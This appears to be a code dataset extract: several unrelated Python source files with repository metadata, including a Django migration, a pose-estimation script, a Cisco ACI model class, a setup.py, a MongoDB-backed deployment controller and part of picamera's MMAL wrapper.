('modified', self.gf('model_utils.fields.AutoLastModifiedField')(default=datetime.datetime.now)),
('contact', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['contacts.Contact'], primary_key=True, unique=True)),
('gallery_id', self.gf('django.db.models.fields.IntegerField')()),
('biography', self.gf('django.db.models.fields.TextField')()),
('price', self.gf('django.db.models.fields.TextField')()),
('info', self.gf('django.db.models.fields.TextField')()),
('commission', self.gf('django.db.models.fields.DecimalField')(decimal_places=3, max_digits=4)),
))
db.send_create_signal('artists', ['Artist'])
def backwards(self, orm):
# Deleting model 'Artist'
db.delete_table('artists_artist')
models = {
'artists.artist': {
'Meta': {'object_name': 'Artist'},
'biography': ('django.db.models.fields.TextField', [], {}),
'commission': ('django.db.models.fields.DecimalField', [], {'decimal_places': '3', 'max_digits': '4'}),
'contact': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['contacts.Contact']", 'primary_key': 'True', 'unique': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'gallery_id': ('django.db.models.fields.IntegerField', [], {}),
'info': ('django.db.models.fields.TextField', [], {}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'price': ('django.db.models.fields.TextField', [], {})
},
'categories.category': {
'Meta': {'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
'contacts.address': {
'Meta': {'object_name': 'Address'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.Contact']"}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'postcode': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'contacts.contact': {
'Meta': {'object_name': 'Contact'},
'addressed_as': ('django.db.models.fields.CharField', [], {'default': "'calculated'", 'max_length': '100'}),
'addressed_as_custom': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'null': 'True', 'blank': 'True', 'to': "orm['categories.Category']"}),
'company': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'company_or_individual': ('django.db.models.fields.CharField', [], {'default': "'individual'", 'max_length': '10'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'department': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'job_title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'main_address': ('django.db.models.fields.related.ForeignKey', [], {'null': 'True', 'to': "orm['contacts.Address']", 'blank': 'True', 'related_name': "'main_address'"}),
'main_phonenumber': ('django.db.models.fields.related.ForeignKey', [], {'null': 'True', 'to': "orm['contacts.PhoneNumber']", 'blank': 'True', 'related_name': "'main_phonenumber'"}),
'migration_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'name_first': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'name_last': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'name_middle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255', 'blank': 'True'}),
'suffix': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.ContactType']"})
},
'contacts.contacttype': {
'Meta': {'object_name': 'ContactType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'contacts.phonenumber': {
'Meta': {'object_name': 'PhoneNumber'},
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contacts.Contact']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['artists']
| [
"[email protected]"
]
| |
a0d0b8457024d2982d5052c463bd38f342cf93d4 | e18f0a32703fbe841d27c8a0e55eca9b9ab39cce | /run.py | c3e6569870cc01a9823fac62025ce182b58ea349 | [
"Apache-2.0"
]
| permissive | qybing/tf-pose-estimation | 302550e74d457edea178b8e36a9cd58c1cbe89e8 | 9adc3d4bf1c87fba4df977b83cee8e656882fe15 | refs/heads/master | 2023-04-10T08:59:08.778691 | 2019-06-19T06:11:49 | 2019-06-19T06:11:49 | 189,166,320 | 0 | 0 | Apache-2.0 | 2023-03-25T00:06:18 | 2019-05-29T06:44:17 | PureBasic | UTF-8 | Python | false | false | 3,518 | py | import argparse
import logging
import sys
import time
from tf_pose import common
import cv2
import numpy as np
from tf_pose.estimator import TfPoseEstimator
from tf_pose.networks import get_graph_path, model_wh
logger = logging.getLogger('TfPoseEstimatorRun')
logger.handlers.clear()
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='tf-pose-estimation run')
parser.add_argument('--image', type=str, default='./images/p1.jpg')
parser.add_argument('--model', type=str, default='mobilenet_thin',
help='cmu / mobilenet_thin / mobilenet_v2_large / mobilenet_v2_small')
parser.add_argument('--resize', type=str, default='0x0',
help='if provided, resize images before they are processed. '
'default=0x0, Recommends : 432x368 or 656x368 or 1312x736 ')
parser.add_argument('--resize-out-ratio', type=float, default=4.0,
help='if provided, resize heatmaps before they are post-processed. default=1.0')
args = parser.parse_args()
w, h = model_wh(args.resize)
if w == 0 or h == 0:
e = TfPoseEstimator(get_graph_path(args.model), target_size=(432, 368))
else:
e = TfPoseEstimator(get_graph_path(args.model), target_size=(w, h))
# estimate human poses from a single image !
image = common.read_imgfile(args.image, None, None)
if image is None:
logger.error('Image can not be read, path=%s' % args.image)
sys.exit(-1)
t = time.time()
humans = e.inference(image, resize_to_default=(w > 0 and h > 0), upsample_size=args.resize_out_ratio)
elapsed = time.time() - t
logger.info('inference image: %s in %.4f seconds.' % (args.image, elapsed))
image = TfPoseEstimator.draw_humans(image, humans, imgcopy=False)
try:
import matplotlib.pyplot as plt
fig = plt.figure()
a = fig.add_subplot(2, 2, 1)
a.set_title('Result')
plt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
bgimg = cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_BGR2RGB)
bgimg = cv2.resize(bgimg, (e.heatMat.shape[1], e.heatMat.shape[0]), interpolation=cv2.INTER_AREA)
# show network output
a = fig.add_subplot(2, 2, 2)
plt.imshow(bgimg, alpha=0.5)
tmp = np.amax(e.heatMat[:, :, :-1], axis=2)
plt.imshow(tmp, cmap=plt.cm.gray, alpha=0.5)
plt.colorbar()
tmp2 = e.pafMat.transpose((2, 0, 1))
tmp2_odd = np.amax(np.absolute(tmp2[::2, :, :]), axis=0)
tmp2_even = np.amax(np.absolute(tmp2[1::2, :, :]), axis=0)
a = fig.add_subplot(2, 2, 3)
a.set_title('Vectormap-x')
# plt.imshow(CocoPose.get_bgimg(inp, target_size=(vectmap.shape[1], vectmap.shape[0])), alpha=0.5)
plt.imshow(tmp2_odd, cmap=plt.cm.gray, alpha=0.5)
plt.colorbar()
a = fig.add_subplot(2, 2, 4)
a.set_title('Vectormap-y')
# plt.imshow(CocoPose.get_bgimg(inp, target_size=(vectmap.shape[1], vectmap.shape[0])), alpha=0.5)
plt.imshow(tmp2_even, cmap=plt.cm.gray, alpha=0.5)
plt.colorbar()
plt.show()
except Exception as e:
logger.warning('matplitlib error, %s' % e)
cv2.imshow('result', image)
cv2.waitKey()
| [
"[email protected]"
]
| |
f7069d0de200d1883e7840ebfcdab0ad60192a08 | 3c000380cbb7e8deb6abf9c6f3e29e8e89784830 | /venv/Lib/site-packages/cobra/modelimpl/fv/abd.py | 3dd4529c22f77fef93c0dbd871cbccde845e5b30 | []
| no_license | bkhoward/aciDOM | 91b0406f00da7aac413a81c8db2129b4bfc5497b | f2674456ecb19cf7299ef0c5a0887560b8b315d0 | refs/heads/master | 2023-03-27T23:37:02.836904 | 2021-03-26T22:07:54 | 2021-03-26T22:07:54 | 351,855,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,840 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class ABD(Mo):
meta = ClassMeta("cobra.model.fv.ABD")
meta.isAbstract = True
meta.moClassName = "fvABD"
meta.moClassName = "fvABD"
meta.rnFormat = ""
meta.category = MoCategory.REGULAR
meta.label = "None"
meta.writeAccessMask = 0x0
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = False
meta.isConfigurable = True
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.superClasses.add("cobra.model.fv.L2Dom")
meta.superClasses.add("cobra.model.fv.Def")
meta.superClasses.add("cobra.model.pol.DefRoot")
meta.superClasses.add("cobra.model.fv.Dom")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.concreteSubClasses.add("cobra.model.fv.SvcBD")
meta.concreteSubClasses.add("cobra.model.fv.BD")
meta.concreteSubClasses.add("cobra.model.fv.BDDef")
meta.rnPrefixes = [
]
prop = PropMeta("str", "OptimizeWanBandwidth", "OptimizeWanBandwidth", 34472, PropCategory.REGULAR)
prop.label = "Optimize Wan Bandwidth between sites"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("OptimizeWanBandwidth", prop)
prop = PropMeta("str", "arpFlood", "arpFlood", 1693, PropCategory.REGULAR)
prop.label = "ARP Flooding"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("arpFlood", prop)
prop = PropMeta("str", "bcastP", "bcastP", 1691, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("bcastP", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "configIssues", "configIssues", 26448, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "ok"
prop._addConstant("FHS-enabled-on-l2-only-bd", "first-hop-security-enabled-on-layer-2-only-bridge-domain", 2)
prop._addConstant("igmp-snoop-disabled-on-multicast-if", "igmpsnoop-disabled-on-multicast-enabled-bd", 1)
prop._addConstant("ok", "ok", 0)
meta.props.add("configIssues", prop)
prop = PropMeta("str", "descr", "descr", 5614, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "epClear", "epClear", 31106, PropCategory.REGULAR)
prop.label = "Clear Endpoints"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("epClear", prop)
prop = PropMeta("str", "epMoveDetectMode", "epMoveDetectMode", 19110, PropCategory.REGULAR)
prop.label = "EP Move Detection Mode"
prop.isConfig = True
prop.isAdmin = True
prop._addConstant("garp", "garp-based-detection", 1)
meta.props.add("epMoveDetectMode", prop)
prop = PropMeta("str", "intersiteBumTrafficAllow", "intersiteBumTrafficAllow", 30545, PropCategory.REGULAR)
prop.label = "Allow BUM traffic between sites"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("intersiteBumTrafficAllow", prop)
prop = PropMeta("str", "intersiteL2Stretch", "intersiteL2Stretch", 33178, PropCategory.REGULAR)
prop.label = "Allow l2Stretch between sites"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("intersiteL2Stretch", prop)
prop = PropMeta("str", "ipLearning", "ipLearning", 21254, PropCategory.REGULAR)
prop.label = "Ip Learning"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = True
prop.defaultValueStr = "yes"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("ipLearning", prop)
prop = PropMeta("str", "ipv6McastAllow", "ipv6McastAllow", 47406, PropCategory.REGULAR)
prop.label = "ipv6 Multicast Allow"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("ipv6McastAllow", prop)
prop = PropMeta("str", "limitIpLearnToSubnets", "limitIpLearnToSubnets", 20851, PropCategory.REGULAR)
prop.label = "Limit IP learning to BD subnets only"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = True
prop.defaultValueStr = "yes"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("limitIpLearnToSubnets", prop)
prop = PropMeta("str", "llAddr", "llAddr", 16876, PropCategory.REGULAR)
prop.label = "IPv6 Link Local Address"
prop.isConfig = True
prop.isAdmin = True
meta.props.add("llAddr", prop)
prop = PropMeta("str", "mac", "mac", 1698, PropCategory.REGULAR)
prop.label = "MAC Address"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 280487012409856
prop.defaultValueStr = "00:22:BD:F8:19:FF"
meta.props.add("mac", prop)
prop = PropMeta("str", "mcastAllow", "mcastAllow", 24916, PropCategory.REGULAR)
prop.label = "Multicast Allow"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("mcastAllow", prop)
prop = PropMeta("str", "mtu", "mtu", 1697, PropCategory.REGULAR)
prop.label = "MTU Size"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(576, 9216)]
prop.defaultValue = 1
prop.defaultValueStr = "inherit"
prop._addConstant("inherit", "inherit", 1)
meta.props.add("mtu", prop)
prop = PropMeta("str", "multiDstPktAct", "multiDstPktAct", 18026, PropCategory.REGULAR)
prop.label = "Multi Destination Packet Action"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "bd-flood"
prop._addConstant("bd-flood", "flood-in-bd", 0)
prop._addConstant("drop", "drop", 2)
prop._addConstant("encap-flood", "flood-in-encapsulation", 1)
meta.props.add("multiDstPktAct", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "ownerKey", "ownerKey", 15230, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerKey", prop)
prop = PropMeta("str", "ownerTag", "ownerTag", 15231, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("ownerTag", prop)
prop = PropMeta("str", "pcTag", "pcTag", 1695, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("any", "any", 0)
meta.props.add("pcTag", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "scope", "scope", 1694, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 16777215)]
prop.defaultValue = 0
prop.defaultValueStr = "0"
meta.props.add("scope", prop)
prop = PropMeta("str", "seg", "seg", 1766, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("seg", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
prop = PropMeta("str", "unicastRoute", "unicastRoute", 1692, PropCategory.REGULAR)
prop.label = "Unicast Routing"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = True
prop.defaultValueStr = "yes"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("unicastRoute", prop)
prop = PropMeta("str", "unkMacUcastAct", "unkMacUcastAct", 1696, PropCategory.REGULAR)
prop.label = "Unknown Mac Unicast Action"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 1
prop.defaultValueStr = "proxy"
prop._addConstant("flood", "flood", 0)
prop._addConstant("proxy", "hardware-proxy", 1)
meta.props.add("unkMacUcastAct", prop)
prop = PropMeta("str", "unkMcastAct", "unkMcastAct", 16164, PropCategory.REGULAR)
prop.label = "Unknown Multicast Destination Action"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "flood"
prop._addConstant("flood", "flood", 0)
prop._addConstant("opt-flood", "optimized-flood", 1)
meta.props.add("unkMcastAct", prop)
prop = PropMeta("str", "v6unkMcastAct", "v6unkMcastAct", 47702, PropCategory.REGULAR)
prop.label = "Unknown V6 Multicast Destination Action"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "flood"
prop._addConstant("flood", "flood", 0)
prop._addConstant("opt-flood", "optimized-flood", 1)
meta.props.add("v6unkMcastAct", prop)
prop = PropMeta("str", "vmac", "vmac", 21204, PropCategory.REGULAR)
prop.label = "Virtual MAC Address"
prop.isConfig = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "not-applicable"
prop._addConstant("not-applicable", "not-configured", 0)
meta.props.add("vmac", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
]
| |
bd94282c6683da22e869c64a0dd76f5ba27d7158 | 35c1dcb0c8a713725a8d9d3062df26b096a4c150 | /setup.py | 295d74e177fe1a2cc941145ea359d2970b74527a | [
"MIT"
]
| permissive | ijgarcesc/pybiblio | 84fc78c09866a65bd13945ab36c8841587d74f09 | 02428eba8c4fcef3f9311ca9ba7be6bab661ca9e | refs/heads/master | 2021-07-15T07:40:08.319875 | 2017-10-18T13:57:08 | 2017-10-18T13:57:08 | 105,827,028 | 0 | 0 | null | 2017-10-04T22:48:12 | 2017-10-04T22:48:12 | null | UTF-8 | Python | false | false | 899 | py | from setuptools import setup
def readme():
with open('README.md') as f:
return f.read()
setup(name='pybiblio',
version='0.0.0',
description='Analysis of bibliographic information using python',
long_description='A tool for creating and gradding assignments in the Jupyter Notebook using the Virtual Programming Lab plugging and Moodle',
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.5',
'Intended Audience :: Education',
'License :: Free For Educational Use',
],
keywords='Scopus',
url='http://github.com/jdvelasq/pybiblio',
author='Juan D. Velasquez, Johana Garces',
author_email='[email protected]',
license='MIT',
packages=['pybibio'],
include_package_data=True,
zip_safe=False)
| [
"[email protected]"
]
| |
3245b49aa803d9fd7eaad75b78856c0dd540cbf0 | 1d4adeca605818749247235dba11a90fbc154748 | /deprecated/services/deployment/deployment_controller.py | 6ccff0b553fb38655e4e8f6737b142ce9a9a71f7 | [
"Apache-2.0"
]
| permissive | joshish-iu/cloudmesh-nist | 4598cd884fb9faaef5ea5cc5fa3e3920dbc6ebff | c26952859c2230231420058f6c488c9f6cc73218 | refs/heads/master | 2020-05-26T13:11:51.730994 | 2019-05-21T10:42:28 | 2019-05-21T10:42:28 | 188,243,290 | 0 | 0 | NOASSERTION | 2019-05-23T13:48:49 | 2019-05-23T13:48:48 | null | UTF-8 | Python | false | false | 905 | py | import connexion
import six
#from deployment_controller import *
from swagger_server.models.deployment import Deployment # noqa: E501
from swagger_server import util
from pymongo import MongoClient
client = MongoClient()
db = client['cm']
deployments = db['deployment']
def get_deployment():
"""
:return: list all the deployments as a list
"""
# ok
return list(deployments.find({}, {'_id': False}))
def add_deployment(deployment=None):
# ok
if connexion.request.is_json:
deployment = Deployment.from_dict(deployment)
deployments.insert(deployment.to_dict())
return deployment
def get_deployment_by_name(name):
# BUG: not yet gaurantiied there is only one name
for element in deployments.find({'name':name}):
return (element['name'],
element['description'],
element['value'],
element['kind'])
| [
"[email protected]"
]
| |
d8482c372930f5b396b0f84fea8ef886b2b2b545 | 948205e4d3bbe2200ca41ffc4f450ee96948b50f | /picamera/mmalobj.py | ec167f2f6d6e24dfa2b1bba876addbc6c496c0e7 | [
"BSD-3-Clause"
]
| permissive | TheSpaghettiDetective/picamera | 1a875dec7f616db059034317dee7b38060149253 | f7b9dcc66224d12ff5a22ece61d76cace2376749 | refs/heads/master | 2022-11-24T12:58:12.932558 | 2020-07-28T18:39:26 | 2020-07-28T18:39:26 | 283,290,128 | 2 | 1 | BSD-3-Clause | 2020-07-28T18:05:32 | 2020-07-28T18:05:32 | null | UTF-8 | Python | false | false | 150,486 | py | # vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python header conversion
# Copyright (c) 2013-2017 Dave Jones <[email protected]>
#
# Original headers
# Copyright (c) 2012, Broadcom Europe Ltd
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import (
unicode_literals,
print_function,
division,
absolute_import,
)
# Make Py2's str equivalent to Py3's
str = type('')
import io
import ctypes as ct
import warnings
import weakref
from threading import Thread, Event
from collections import namedtuple
from fractions import Fraction
from itertools import cycle
from functools import reduce
from operator import mul
from . import bcm_host, mmal
from .streams import BufferIO
from .exc import (
mmal_check,
PiCameraValueError,
PiCameraRuntimeError,
PiCameraMMALError,
PiCameraPortDisabled,
PiCameraDeprecated,
)
# Old firmwares confuse the RGB24 and BGR24 encodings. This flag tracks whether
# the order needs fixing (it is set during MMALCamera.__init__).
FIX_RGB_BGR_ORDER = None
# Mapping of parameters to the C-structure they expect / return. If a parameter
# does not appear in this mapping, it cannot be queried / set with the
# MMALControlPort.params attribute.
PARAM_TYPES = {
mmal.MMAL_PARAMETER_ALGORITHM_CONTROL: mmal.MMAL_PARAMETER_ALGORITHM_CONTROL_T,
mmal.MMAL_PARAMETER_ANNOTATE: None, # adjusted by MMALCamera.annotate_rev
mmal.MMAL_PARAMETER_ANTISHAKE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET: mmal.MMAL_PARAMETER_AUDIO_LATENCY_TARGET_T,
mmal.MMAL_PARAMETER_AWB_MODE: mmal.MMAL_PARAMETER_AWBMODE_T,
mmal.MMAL_PARAMETER_BRIGHTNESS: mmal.MMAL_PARAMETER_RATIONAL_T,
mmal.MMAL_PARAMETER_BUFFER_FLAG_FILTER: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS: mmal.MMAL_PARAMETER_BUFFER_REQUIREMENTS_T,
mmal.MMAL_PARAMETER_CAMERA_BURST_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE: mmal.MMAL_PARAMETER_CAMERA_CLOCKING_MODE_T,
mmal.MMAL_PARAMETER_CAMERA_CONFIG: mmal.MMAL_PARAMETER_CAMERA_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_CUSTOM_SENSOR_CONFIG: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_INFO: None, # adjusted by MMALCameraInfo.info_rev
mmal.MMAL_PARAMETER_CAMERA_INTERFACE: mmal.MMAL_PARAMETER_CAMERA_INTERFACE_T,
mmal.MMAL_PARAMETER_CAMERA_ISP_BLOCK_OVERRIDE: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_MIN_ISO: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_CAMERA_NUM: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG: mmal.MMAL_PARAMETER_CAMERA_RX_CONFIG_T,
mmal.MMAL_PARAMETER_CAMERA_RX_TIMING: mmal.MMAL_PARAMETER_CAMERA_RX_TIMING_T,
mmal.MMAL_PARAMETER_CAMERA_SETTINGS: mmal.MMAL_PARAMETER_CAMERA_SETTINGS_T,
mmal.MMAL_PARAMETER_CAMERA_USE_CASE: mmal.MMAL_PARAMETER_CAMERA_USE_CASE_T,
mmal.MMAL_PARAMETER_CAPTURE_EXPOSURE_COMP: mmal.MMAL_PARAMETER_INT32_T,
mmal.MMAL_PARAMETER_CAPTURE: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_MODE: mmal.MMAL_PARAMETER_CAPTUREMODE_T,
mmal.MMAL_PARAMETER_CAPTURE_STATS_PASS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_CAPTURE_STATUS: mmal.MMAL_PARAMETER_CAPTURE_STATUS_T,
mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST: mmal.MMAL_PARAMETER_CHANGE_EVENT_REQUEST_T,
mmal.MMAL_PARAMETER_CLOCK_ACTIVE: mmal.MMAL_PARAMETER_BOOLEAN_T,
